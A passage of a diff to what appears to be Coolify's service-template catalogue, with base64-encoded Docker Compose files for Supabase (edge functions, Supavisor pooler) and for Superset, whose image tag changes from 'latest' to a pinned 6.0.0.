W50ZXJ2YWw6IDVzCiAgICAgIHJldHJpZXM6IDMKICAgIGVudmlyb25tZW50OgogICAgICAtICdKV1RfU0VDUkVUPSR7U0VSVklDRV9QQVNTV09SRF9KV1R9JwogICAgICAtICdTVVBBQkFTRV9VUkw9JHtTRVJWSUNFX0ZRRE5fU1VQQUJBU0VLT05HfScKICAgICAgLSAnU1VQQUJBU0VfQU5PTl9LRVk9JHtTRVJWSUNFX1NVUEFCQVNFQU5PTl9LRVl9JwogICAgICAtICdTVVBBQkFTRV9TRVJWSUNFX1JPTEVfS0VZPSR7U0VSVklDRV9TVVBBQkFTRVNFUlZJQ0VfS0VZfScKICAgICAgLSAnU1VQQUJBU0VfREJfVVJMPXBvc3RncmVzcWw6Ly9wb3N0Z3Jlczoke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QCR7UE9TVEdSRVNfSE9TVE5BTUU6LXN1cGFiYXNlLWRifToke1BPU1RHUkVTX1BPUlQ6LTU0MzJ9LyR7UE9TVEdSRVNfREI6LXBvc3RncmVzfScKICAgICAgLSAnVkVSSUZZX0pXVD0ke0ZVTkNUSU9OU19WRVJJRllfSldUOi1mYWxzZX0nCiAgICB2b2x1bWVzOgogICAgICAtICcuL3ZvbHVtZXMvZnVuY3Rpb25zOi9ob21lL2Rlbm8vZnVuY3Rpb25zJwogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi92b2x1bWVzL2Z1bmN0aW9ucy9tYWluL2luZGV4LnRzCiAgICAgICAgdGFyZ2V0OiAvaG9tZS9kZW5vL2Z1bmN0aW9ucy9tYWluL2luZGV4LnRzCiAgICAgICAgY29udGVudDogImltcG9ydCB7IHNlcnZlIH0gZnJvbSAnaHR0cHM6Ly9kZW5vLmxhbmQvc3RkQDAuMTMxLjAvaHR0cC9zZXJ2ZXIudHMnXG5pbXBvcnQgKiBhcyBqb3NlIGZyb20gJ2h0dHBzOi8vZGVuby5sYW5kL3gvam9zZUB2NC4xNC40L2luZGV4LnRzJ1xuXG5jb25zb2xlLmxvZygnbWFpbiBmdW5jdGlvbiBzdGFydGVkJylcblxuY29uc3QgSldUX1NFQ1JFVCA9IERlbm8uZW52LmdldCgnSldUX1NFQ1JFVCcpXG5jb25zdCBWRVJJRllfSldUID0gRGVuby5lbnYuZ2V0KCdWRVJJRllfSldUJykgPT09ICd0cnVlJ1xuXG5mdW5jdGlvbiBnZXRBdXRoVG9rZW4ocmVxOiBSZXF1ZXN0KSB7XG4gIGNvbnN0IGF1dGhIZWFkZXIgPSByZXEuaGVhZGVycy5nZXQoJ2F1dGhvcml6YXRpb24nKVxuICBpZiAoIWF1dGhIZWFkZXIpIHtcbiAgICB0aHJvdyBuZXcgRXJyb3IoJ01pc3NpbmcgYXV0aG9yaXphdGlvbiBoZWFkZXInKVxuICB9XG4gIGNvbnN0IFtiZWFyZXIsIHRva2VuXSA9IGF1dGhIZWFkZXIuc3BsaXQoJyAnKVxuICBpZiAoYmVhcmVyICE9PSAnQmVhcmVyJykge1xuICAgIHRocm93IG5ldyBFcnJvcihgQXV0aCBoZWFkZXIgaXMgbm90ICdCZWFyZXIge3Rva2VufSdgKVxuICB9XG4gIHJldHVybiB0b2tlblxufVxuXG5hc3luYyBmdW5jdGlvbiB2ZXJpZnlKV1Qoand0OiBzdHJpbmcpOiBQcm9taXNlPGJvb2xlYW4+IHtcbiAgY29uc3QgZW5jb2RlciA9IG5ldyBUZXh0RW5jb2RlcigpXG4gIGNvbnN0IHNlY3JldEtleSA9IGVuY29kZXIuZW5jb2RlKEpXVF9TRUNSRVQpXG4gIHRyeSB7XG4gICAgYXdhaXQgam9zZS5qd3RWZXJpZnkoand0LCBzZWNyZXRLZXkpXG4gIH0gY2F0Y2ggKGVycikge1xuICAgIGNvbnNvbGUuZXJyb3IoZXJyKVxuICAgIHJldHVybiBmYWxzZVxuICB9XG4gIHJldHVybiB0cnVlXG59XG5cbnNlcnZlKGFzeW5jIChyZXE6IFJlcXVlc3QpID0+IHtcbiAgaWYgKHJlcS5tZXRob2QgIT09ICdPUFRJT05TJyAmJiBWRVJJRllfSldUKSB7XG4gICAgdHJ5IHtcbiAgICAgIGNvbnN0IHRva2VuID0gZ2V0QXV0aFRva2VuKHJlcSlcbiAgICAgIGNvbnN0IGlzVmFsaWRKV1QgPSBhd2FpdCB2ZXJpZnlKV1QodG9rZW4pXG5cbiAgICAgIGlmICghaXNWYWxpZEpXVCkge1xuICAgICAgICByZXR1cm4gbmV3IFJlc3BvbnNlKEpTT04uc3RyaW5naWZ5KHsgbXNnOiAnSW52YWxpZCBKV1QnIH0pLCB7XG4gICAgICAgICAgc3RhdHVzOiA0MDEsXG4gICAgICAgICAgaGVhZGVyczogeyAnQ29udGVudC1UeXBlJzogJ2FwcGxpY2F0aW9uL2pzb24nIH0sXG4gICAgICAgIH0pXG4gICAgICB9XG4gICAgfSBjYXRjaCAoZSkge1xuICAgICAgY29uc29sZS5lcnJvcihlKVxuICAgICAgcmV0dXJuIG5ldyBSZXNwb25zZShKU09OLnN0cmluZ2lmeSh7IG1zZzogZS50b1N0cmluZygpIH0pLCB7XG4gICAgICAgIHN0YXR1czogNDAxLFxuICAgICAgICBoZWFkZXJzOiB7ICdDb250ZW50LVR5cGUnOiAnYXBwbGljYXRpb24vanNvbicgfSxcbiAgICAgIH0pXG4gICAgfVxuICB9XG5cbiAgY29uc3QgdXJsID0gbmV3IFVSTChyZXEudXJsKVxuICBjb25zdCB7IHBhdGhuYW1lIH0gPSB1cmxcbiAgY29uc3QgcGF0aF9wYXJ0cyA9IHBhdGhuYW1lLnNwbGl0KCcvJylcbiAgY29uc3Qgc2VydmljZV9uYW1lID0gcGF0aF9wYXJ0c1sxXVxuXG4gIGlmICghc2VydmljZV9uYW1lIHx8IHNlcnZpY2VfbmFtZSA9PT0gJycpIHtcbiAgICBjb25zdCBlcnJvciA9IHsgbXNnOiAnbWlzc2luZyBmdW5jdGlvbiBuYW1lIGluIHJlcXVlc3QnIH1cbiAgICByZXR1cm4gbmV3IFJlc3BvbnNlKEpTT04uc3RyaW5naWZ5KGVycm9yKSwge1xuICAgICAgc3RhdHVzOiA0MDAsXG4gICAgICBoZWFkZXJzOiB7ICdDb250ZW50LVR5cGUnOiAnYXBwbGljYXRpb24vanNvbicgfSxcbiAgICB9KVxuICB9XG5cbiAgY29uc3Qgc2VydmljZVBhdGggPSBgL2hvbWUvZGVuby9mdW5jdGlvbnMvJHtzZXJ2aWNlX25hbWV9YFxuICBjb25zb2xlLmVycm9yKGBzZXJ2aW5nIHRoZSByZXF1ZXN0IHdpdGggJHtzZXJ2aWNlUGF0aH1gKVxuXG4gIGNvbnN0IG1lbW9yeUxpbWl0TWIgPSAxNTBcbiAgY29uc3Qgd29ya2VyVGltZW91dE1zID0gMSAqIDYwICogMTAwMFxuICBjb25zdCBub01vZHVsZUNhY2hlID0gZmFsc2VcbiAgY29uc3QgaW1wb3J0TWFwUGF0aCA9IG51bGxcbiAgY29uc3QgZW52VmFyc09iaiA9IERlbm8uZW52LnRvT2JqZWN0KClcbiAgY29uc3QgZW52VmFycyA9IE9iamVjdC5rZXlzKGVudlZhcnNPYmopLm1hcCgoaykgPT4gW2ssIGVudlZhcnNPYmpba11dKVxuXG4gIHRyeSB7XG4gICAgY29uc3Qgd29ya2VyID0gYXdhaXQgRWRnZVJ1bnRpbWUudXNlcldvcmtlcnMuY3JlYXRlKHtcbiAgICAgIHNlcnZpY2VQYXRoLFxuICAgICAgbWVtb3J5TGltaXRNYixcbiAgICAgIHdvcmtlclRpbWVvdXRNcyxcbiAgICAgIG5vTW9kdWxlQ2FjaGUsXG4gICAgICBpbXBvcnRNYXBQYXRoLFxuICAgICAgZW52VmFycyxcbiAgICB9KVxuICAgIHJldHVybiBhd2FpdCB3b3JrZXIuZmV0Y2gocmVxKVxuICB9IGNhdGNoIChlKSB7XG4gICAgY29uc3QgZXJyb3IgPSB7IG1zZzogZS50b1N0cmluZygpIH1cbiAgICByZXR1cm4gbmV3IFJlc3BvbnNlKEpTT04uc3RyaW5naWZ5KGVycm9yKSwge1xuICAgICAgc3RhdHVzOiA1MDAsXG4gICAgICBoZWFkZXJzOiB7ICdDb250ZW50LVR5cGUnOiAnYXBwbGljYXRpb24vanNvbicgfSxcbiAgICB9KVxuICB9XG59KSIKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vdm9sdW1lcy9mdW5jdGlvbnMvaGVsbG8vaW5kZXgudHMKICAgICAgICB0YXJnZXQ6IC9ob21lL2Rlbm8vZnVuY3Rpb25zL2hlbGxvL2luZGV4LnRzCiAgICAgICAgY29udGVudDogIi8vIEZvbGxvdyB0aGlzIHNldHVwIGd1aWRlIHRvIGludGVncmF0ZSB0aGUgRGVubyBsYW5ndWFnZSBzZXJ2ZXIgd2l0aCB5b3VyIGVkaXRvcjpcbi8vIGh0dHBzOi8vZGVuby5sYW5kL21hbnVhbC9nZXR0aW5nX3N0YXJ0ZWQvc2V0dXBfeW91cl9lbnZpcm9ubWVudFxuLy8gVGhpcyBlbmFibGVzIGF1dG9jb21wbGV0ZSwgZ28gdG8gZGVmaW5pdGlvbiwgZXRjLlxuXG5pbXBvcnQgeyBzZXJ2ZSB9IGZyb20gXCJodHRwczovL2Rlbm8ubGFuZC9zdGRAMC4xNzcuMS9odHRwL3NlcnZlci50c1wiXG5cbnNlcnZlKGFzeW5jICgpID0+IHtcbiAgcmV0dXJuIG5ldyBSZXNwb25zZShcbiAgICBgXCJIZWxsbyBmcm9tIEVkZ2UgRnVuY3Rpb25zIVwiYCxcbiAgICB7IGhlYWRlcnM6IHsgXCJDb250ZW50LVR5cGVcIjogXCJhcHBsaWNhdGlvbi9qc29uXCIgfSB9LFxuICApXG59KVxuXG4vLyBUbyBpbnZva2U6XG4vLyBjdXJsICdodHRwOi8vbG9jYWxob3N0OjxLT05HX0hUVFBfUE9SVD4vZnVuY3Rpb25zL3YxL2hlbGxvJyBcXFxuLy8gICAtLWhlYWRlciAnQXV0aG9yaXphdGlvbjogQmVhcmVyIDxhbm9uL3NlcnZpY2Vfcm9sZSBBUEkga2V5PidcbiIKICAgIGNvbW1hbmQ6CiAgICAgIC0gc3RhcnQKICAgICAgLSAnLS1tYWluLXNlcnZpY2UnCiAgICAgIC0gL2hvbWUvZGVuby9mdW5jdGlvbnMvbWFpbgogIHN1cGFiYXNlLXN1cGF2aXNvcjoKICAgIGltYWdlOiAnc3VwYWJhc2Uvc3VwYXZpc29yOjIuNS4xJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICctc1NmTCcKICAgICAgICAtICctbycKICAgICAgICAtIC9kZXYvbnVsbAogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6NDAwMC9hcGkvaGVhbHRoJwogICAgICB0aW1lb3V0OiA1cwogICAgICBpbnRlcnZhbDogNXMKICAgICAgcmV0cmllczogMTAKICAgIGRlcGVuZHNfb246CiAgICAgIHN1cGFiYXNlLWRiOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHN1cGFiYXNlLWFuYWx5dGljczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gUE9PTEVSX1RFTkFOVF9JRD1kZXZfdGVuYW50CiAgICAgIC0gUE9PTEVSX1BPT0xfTU9ERT10cmFuc2FjdGlvbgogICAgICAtICdQT09MRVJfREVGQVVMVF9QT09MX1NJWkU9JHtQT09MRVJfREVGQVVMVF9QT09MX1NJWkU6LTIwfScKICAgICAgLSAnUE9PTEVSX01BWF9DTElFTlRfQ09OTj0ke1BPT0xFUl9NQVhfQ0xJRU5UX0NPTk46LTEwMH0nCiAgICAgIC0gUE9SVD00MDAwCiAgICAgIC0gJ1BPU1RHUkVTX1BPUlQ9JHtQT1NUR1JFU19QT1JUOi01NDMyfScKICAgICAgLSAnUE9TVEdSRVNfSE9TVE5BTUU9JHtQT1NUR1JFU19IT1NUTkFNRTotc3VwYWJhc2UtZGJ9JwogICAgICAtICdQT1NUR1JFU19EQj0ke1BPU1RHUkVTX0RCOi1wb3N0Z3Jlc30nCiAgICAgIC0gJ1BPU1RHUkVTX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU30nCiAgICAgIC0gJ0RBVEFCQVNFX1VSTD1lY3RvOi8vc3VwYWJhc2VfYWRtaW46JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUAke1BPU1RHUkVTX0hPU1ROQU1FOi1zdXBhYmFzZS1kYn06JHtQT1NUR1JFU19QT1JUOi01NDMyfS9fc3VwYWJhc2UnCiAgICAgIC0gQ0xVU1RFUl9QT1NUR1JFUz10cnVlCiAgICAgIC0gJ1NFQ1JFVF9LRVlfQkFTRT0ke1NFUlZJQ0VfUEFTU1dPUkRfU1VQQVZJU09SU0VDUkVUfScKICAgICAgLSAnVkFVTFRfRU5DX0tFWT0ke1NFUlZJQ0VfUEFTU1dPUkRfVkFVTFRFTkN9JwogICAgICAtICdBUElfSldUX1NFQ1JFVD0ke1NFUlZJQ0VfUEFTU1dPUkRfSldUfScKICAgICAgLSAnTUVUUklDU19KV1RfU0VDUkVUPSR7U0VSVklDRV9QQVNTV09SRF9KV1R9JwogICAgICAtIFJFR0lPTj1sb2NhbAogICAgICAtICdFUkxfQUZMQUdTPS1wcm90b19kaXN0IGluZXRfdGNwJwogICAgY29tbWFuZDoKICAgICAgLSAvYmluL3NoCiAgICAgIC0gJy1jJwogICAgICAtICcvYXBwL2Jpbi9taWdyYXRlICYmIC9hcHAvYmluL3N1cGF2aXNvciBldmFsICIkJChjYXQgL2V0Yy9wb29sZXIvcG9vbGVyLmV4cykiICYmIC9hcHAvYmluL3NlcnZlcicKICAgIHZvbHVtZXM6CiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3ZvbHVtZXMvcG9vbGVyL3Bvb2xlci5leHMKICAgICAgICB0YXJnZXQ6IC9ldGMvcG9vbGVyL3Bvb2xlci5leHMKICAgICAgICBjb250ZW50OiAiezpvaywgX30gPSBBcHBsaWNhdGlvbi5lbnN1cmVfYWxsX3N0YXJ0ZWQoOnN1cGF2aXNvcilcbns6b2ssIHZlcnNpb259ID1cbiAgICBjYXNlIFN1cGF2aXNvci5SZXBvLnF1ZXJ5IShcInNlbGVjdCB2ZXJzaW9uKClcIikgZG9cbiAgICAle3Jvd3M6IFtbdmVyXV19IC0+IFN1cGF2aXNvci5IZWxwZXJzLnBhcnNlX3BnX3ZlcnNpb24odmVyKVxuICAgIF8gLT4gbmlsXG4gICAgZW5kXG5wYXJhbXMgPSAle1xuICAgIFwiZXh0ZXJuYWxfaWRcIiA9PiBTeXN0ZW0uZ2V0X2VudihcIlBPT0xFUl9URU5BTlRfSURcIiksXG4gICAgXCJkYl9ob3N0XCIgPT4gU3lzdGVtLmdldF9lbnYoXCJQT1NUR1JFU19IT1NUTkFNRVwiKSxcbiAgICBcImRiX3BvcnRcIiA9PiBTeXN0ZW0uZ2V0X2VudihcIlBPU1RHUkVTX1BPUlRcIikgfD4gU3RyaW5nLnRvX2ludGVnZXIoKSxcbiAgICBcImRiX2RhdGFiYXNlXCIgPT4gU3lzdGVtLmdldF9lbnYoXCJQT1NUR1JFU19EQlwiKSxcbiAgICBcInJlcXVpcmVfdXNlclwiID0+IGZhbHNlLFxuICAgIFwiYXV0aF9xdWVyeVwiID0+IFwiU0VMRUNUICogRlJPTSBwZ2JvdW5jZXIuZ2V0X2F1dGgoJDEpXCIsXG4gICAgXCJkZWZhdWx0X21heF9jbGllbnRzXCIgPT4gU3lzdGVtLmdldF9lbnYoXCJQT09MRVJfTUFYX0NMSUVOVF9DT05OXCIpLFxuICAgIFwiZGVmYXVsdF9wb29sX3NpemVcIiA9PiBTeXN0ZW0uZ2V0X2VudihcIlBPT0xFUl9ERUZBVUxUX1BPT0xfU0laRVwiKSxcbiAgICBcImRlZmF1bHRfcGFyYW1ldGVyX3N0YXR1c1wiID0+ICV7XCJzZXJ2ZXJfdmVyc2lvblwiID0+IHZlcnNpb259LFxuICAgIFwidXNlcnNcIiA9PiBbJXtcbiAgICBcImRiX3VzZXJcIiA9PiBcInBnYm91bmNlclwiLFxuICAgIFwiZGJfcGFzc3dvcmRcIiA9PiBTeXN0ZW0uZ2V0X2VudihcIlBPU1RHUkVTX1BBU1NXT1JEXCIpLFxuICAgIFwibW9kZV90eXBlXCIgPT4gU3lzdGVtLmdldF9lbnYoXCJQT09MRVJfUE9PTF9NT0RFXCIpLFxuICAgIFwicG9vbF9zaXplXCIgPT4gU3lzdGVtLmdldF9lbnYoXCJQT09MRVJfREVGQVVMVF9QT09MX1NJWkVcIiksXG4gICAgXCJpc19tYW5hZ2VyXCIgPT4gdHJ1ZVxuICAgIH1dXG59XG5cbnRlbmFudCA9IFN1cGF2aXNvci5UZW5hbnRzLmdldF90ZW5hbnRfYnlfZXh0ZXJuYWxfaWQocGFyYW1zW1wiZXh0ZXJuYWxfaWRcIl0pXG5cbmlmIHRlbmFudCBkb1xuICB7Om9rLCBffSA9IFN1cGF2aXNvci5UZW5hbnRzLnVwZGF0ZV90ZW5hbnQodGVuYW50LCBwYXJhbXMpXG5lbHNlXG4gIHs6b2ssIF99ID0gU3VwYXZpc29yLlRlbmFudHMuY3JlYXRlX3RlbmFudChwYXJhbXMpXG5lbmRcbiIK",
         "tags": [
             "firebase",
             "alternative",
@@ -4102,7 +4102,7 @@
     "superset-with-postgresql": {
         "documentation": "https://github.com/amancevice/docker-superset?utm_source=coolify.io",
         "slogan": "Modern data exploration and visualization platform (unofficial community docker image)",
-        "compose": "c2VydmljZXM6CiAgc3VwZXJzZXQ6CiAgICBpbWFnZTogJ2FtYW5jZXZpY2Uvc3VwZXJzZXQ6bGF0ZXN0JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX1NVUEVSU0VUXzgwODgKICAgICAgLSAnU0VDUkVUX0tFWT0ke1NFUlZJQ0VfQkFTRTY0XzY0X1NVUEVSU0VUU0VDUkVUS0VZfScKICAgICAgLSAnTUFQQk9YX0FQSV9LRVk9JHtNQVBCT1hfQVBJX0tFWX0nCiAgICAgIC0gJ1BPU1RHUkVTX1VTRVI9JHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19EQj0ke1BPU1RHUkVTX0RCOi1zdXBlcnNldC1kYn0nCiAgICAgIC0gJ1JFRElTX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9SRURJU30nCiAgICB2b2x1bWVzOgogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi9zdXBlcnNldC9zdXBlcnNldF9jb25maWcucHkKICAgICAgICB0YXJnZXQ6IC9ldGMvc3VwZXJzZXQvc3VwZXJzZXRfY29uZmlnLnB5CiAgICAgICAgY29udGVudDogIlwiXCJcIlxuRm9yIG1vcmUgY29uZmlndXJhdGlvbiBvcHRpb25zLCBzZWU6XG4tIGh0dHBzOi8vc3VwZXJzZXQuYXBhY2hlLm9yZy9kb2NzL2NvbmZpZ3VyYXRpb24vY29uZmlndXJpbmctc3VwZXJzZXRcblwiXCJcIlxuXG5pbXBvcnQgb3NcblxuU0VDUkVUX0tFWSA9IG9zLmdldGVudihcIlNFQ1JFVF9LRVlcIilcbk1BUEJPWF9BUElfS0VZID0gb3MuZ2V0ZW52KFwiTUFQQk9YX0FQSV9LRVlcIiwgXCJcIilcblxuQ0FDSEVfQ09ORklHID0ge1xuICBcIkNBQ0hFX1RZUEVcIjogXCJSZWRpc0NhY2hlXCIsXG4gIFwiQ0FDSEVfREVGQVVMVF9USU1FT1VUXCI6IDMwMCxcbiAgXCJDQUNIRV9LRVlfUFJFRklYXCI6IFwic3VwZXJzZXRfXCIsXG4gIFwiQ0FDSEVfUkVESVNfSE9TVFwiOiBcInJlZGlzXCIsXG4gIFwiQ0FDSEVfUkVESVNfUE9SVFwiOiA2Mzc5LFxuICBcIkNBQ0hFX1JFRElTX0RCXCI6IDEsXG4gIFwiQ0FDSEVfUkVESVNfVVJMXCI6IGZcInJlZGlzOi8vOntvcy5nZXRlbnYoJ1JFRElTX1BBU1NXT1JEJyl9QHJlZGlzOjYzNzkvMVwiLFxufVxuXG5GSUxURVJfU1RBVEVfQ0FDSEVfQ09ORklHID0geyoqQ0FDSEVfQ09ORklHLCBcIkNBQ0hFX0tFWV9QUkVGSVhcIjogXCJzdXBlcnNldF9maWx0ZXJfXCJ9XG5FWFBMT1JFX0ZPUk1fREFUQV9DQUNIRV9DT05GSUcgPSB7KipDQUNIRV9DT05GSUcsIFwiQ0FDSEVfS0VZX1BSRUZJWFwiOiBcInN1cGVyc2V0X2V4cGxvcmVfZm9ybV9cIn1cblxuU1FMQUxDSEVNWV9UUkFDS19NT0RJRklDQVRJT05TID0gVHJ1ZVxuU1FMQUxDSEVNWV9EQVRBQkFTRV9VUkkgPSBmXCJwb3N0Z3Jlc3FsK3BzeWNvcGcyOi8ve29zLmdldGVudignUE9TVEdSRVNfVVNFUicpfTp7b3MuZ2V0ZW52KCdQT1NUR1JFU19QQVNTV09SRCcpfUBwb3N0Z3Jlczo1NDMyL3tvcy5nZXRlbnYoJ1BPU1RHUkVTX0RCJyl9XCJcblxuIyBVbmNvbW1lbnQgaWYgeW91IHdhbnQgdG8gbG9hZCBleGFtcGxlIGRhdGEgKHVzaW5nIFwic3VwZXJzZXQgbG9hZF9leGFtcGxlc1wiKSBhdCB0aGVcbiMgc2FtZSBsb2NhdGlvbiBhcyB5b3VyIG1ldGFkYXRhIHBvc3RncmVzcWwgaW5zdGFuY2UuIE90aGVyd2lzZSwgdGhlIGRlZmF1bHQgc3FsaXRlXG4jIHdpbGwgYmUgdXNlZCwgd2hpY2ggd2lsbCBub3QgcGVyc2lzdCBpbiB2b2x1bWUgd2hlbiByZXN0YXJ0aW5nIHN1cGVyc2V0IGJ5IGRlZmF1bHQuXG4jU1FMQUxDSEVNWV9FWEFNUExFU19VUkkgPSBTUUxBTENIRU1ZX0RBVEFCQVNFX1VSSSIKICAgIGRlcGVuZHNfb246CiAgICAgIHBvc3RncmVzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHJlZGlzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gY3VybAogICAgICAgIC0gJy1mJwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6ODA4OC9oZWFsdGgnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICBwb3N0Z3JlczoKICAgIGltYWdlOiAncG9zdGdyZXM6MTctYWxwaW5lJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ1BPU1RHUkVTX1VTRVI9JHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19EQj0ke1BPU1RHUkVTX0RCOi1zdXBlcnNldC1kYn0nCiAgICB2b2x1bWVzOgogICAgICAtICdzdXBlcnNldF9wb3N0Z3Jlc19kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncGdfaXNyZWFkeSAtVSAkJHtQT1NUR1JFU19VU0VSfSAtZCAkJHtQT1NUR1JFU19EQn0nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICByZWRpczoKICAgIGltYWdlOiAncmVkaXM6OC1hbHBpbmUnCiAgICB2b2x1bWVzOgogICAgICAtICdzdXBlcnNldF9yZWRpc19kYXRhOi9kYXRhJwogICAgY29tbWFuZDogJ3JlZGlzLXNlcnZlciAtLXJlcXVpcmVwYXNzICR7U0VSVklDRV9QQVNTV09SRF9SRURJU30nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDogJ3JlZGlzLWNsaSBwaW5nJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCg==",
+        "compose": "c2VydmljZXM6CiAgc3VwZXJzZXQ6CiAgICBpbWFnZTogJ2FtYW5jZXZpY2Uvc3VwZXJzZXQ6Ni4wLjAnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX0ZRRE5fU1VQRVJTRVRfODA4OAogICAgICAtICdTRUNSRVRfS0VZPSR7U0VSVklDRV9CQVNFNjRfNjRfU1VQRVJTRVRTRUNSRVRLRVl9JwogICAgICAtICdNQVBCT1hfQVBJX0tFWT0ke01BUEJPWF9BUElfS0VZfScKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU30nCiAgICAgIC0gJ1BPU1RHUkVTX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU30nCiAgICAgIC0gJ1BPU1RHUkVTX0RCPSR7UE9TVEdSRVNfREI6LXN1cGVyc2V0LWRifScKICAgICAgLSAnUkVESVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1JFRElTfScKICAgIHZvbHVtZXM6CiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3N1cGVyc2V0L3N1cGVyc2V0X2NvbmZpZy5weQogICAgICAgIHRhcmdldDogL2V0Yy9zdXBlcnNldC9zdXBlcnNldF9jb25maWcucHkKICAgICAgICBjb250ZW50OiAiXCJcIlwiXG5Gb3IgbW9yZSBjb25maWd1cmF0aW9uIG9wdGlvbnMsIHNlZTpcbi0gaHR0cHM6Ly9zdXBlcnNldC5hcGFjaGUub3JnL2RvY3MvY29uZmlndXJhdGlvbi9jb25maWd1cmluZy1zdXBlcnNldFxuXCJcIlwiXG5cbmltcG9ydCBvc1xuXG5TRUNSRVRfS0VZID0gb3MuZ2V0ZW52KFwiU0VDUkVUX0tFWVwiKVxuTUFQQk9YX0FQSV9LRVkgPSBvcy5nZXRlbnYoXCJNQVBCT1hfQVBJX0tFWVwiLCBcIlwiKVxuXG5DQUNIRV9DT05GSUcgPSB7XG4gIFwiQ0FDSEVfVFlQRVwiOiBcIlJlZGlzQ2FjaGVcIixcbiAgXCJDQUNIRV9ERUZBVUxUX1RJTUVPVVRcIjogMzAwLFxuICBcIkNBQ0hFX0tFWV9QUkVGSVhcIjogXCJzdXBlcnNldF9cIixcbiAgXCJDQUNIRV9SRURJU19IT1NUXCI6IFwicmVkaXNcIixcbiAgXCJDQUNIRV9SRURJU19QT1JUXCI6IDYzNzksXG4gIFwiQ0FDSEVfUkVESVNfREJcIjogMSxcbiAgXCJDQUNIRV9SRURJU19VUkxcIjogZlwicmVkaXM6Ly86e29zLmdldGVudignUkVESVNfUEFTU1dPUkQnKX1AcmVkaXM6NjM3OS8xXCIsXG59XG5cbkZJTFRFUl9TVEFURV9DQUNIRV9DT05GSUcgPSB7KipDQUNIRV9DT05GSUcsIFwiQ0FDSEVfS0VZX1BSRUZJWFwiOiBcInN1cGVyc2V0X2ZpbHRlcl9cIn1cbkVYUExPUkVfRk9STV9EQVRBX0NBQ0hFX0NPTkZJRyA9IHsqKkNBQ0hFX0NPTkZJRywgXCJDQUNIRV9LRVlfUFJFRklYXCI6IFwic3VwZXJzZXRfZXhwbG9yZV9mb3JtX1wifVxuXG5TUUxBTENIRU1ZX1RSQUNLX01PRElGSUNBVElPTlMgPSBUcnVlXG5TUUxBTENIRU1ZX0RBVEFCQVNFX1VSSSA9IGZcInBvc3RncmVzcWwrcHN5Y29wZzI6Ly97b3MuZ2V0ZW52KCdQT1NUR1JFU19VU0VSJyl9Ontvcy5nZXRlbnYoJ1BPU1RHUkVTX1BBU1NXT1JEJyl9QHBvc3RncmVzOjU0MzIve29zLmdldGVudignUE9TVEdSRVNfREInKX1cIlxuXG4jIFVuY29tbWVudCBpZiB5b3Ugd2FudCB0byBsb2FkIGV4YW1wbGUgZGF0YSAodXNpbmcgXCJzdXBlcnNldCBsb2FkX2V4YW1wbGVzXCIpIGF0IHRoZVxuIyBzYW1lIGxvY2F0aW9uIGFzIHlvdXIgbWV0YWRhdGEgcG9zdGdyZXNxbCBpbnN0YW5jZS4gT3RoZXJ3aXNlLCB0aGUgZGVmYXVsdCBzcWxpdGVcbiMgd2lsbCBiZSB1c2VkLCB3aGljaCB3aWxsIG5vdCBwZXJzaXN0IGluIHZvbHVtZSB3aGVuIHJlc3RhcnRpbmcgc3VwZXJzZXQgYnkgZGVmYXVsdC5cbiNTUUxBTENIRU1ZX0VYQU1QTEVTX1VSSSA9IFNRTEFMQ0hFTVlfREFUQUJBU0VfVVJJIgogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcmVkaXM6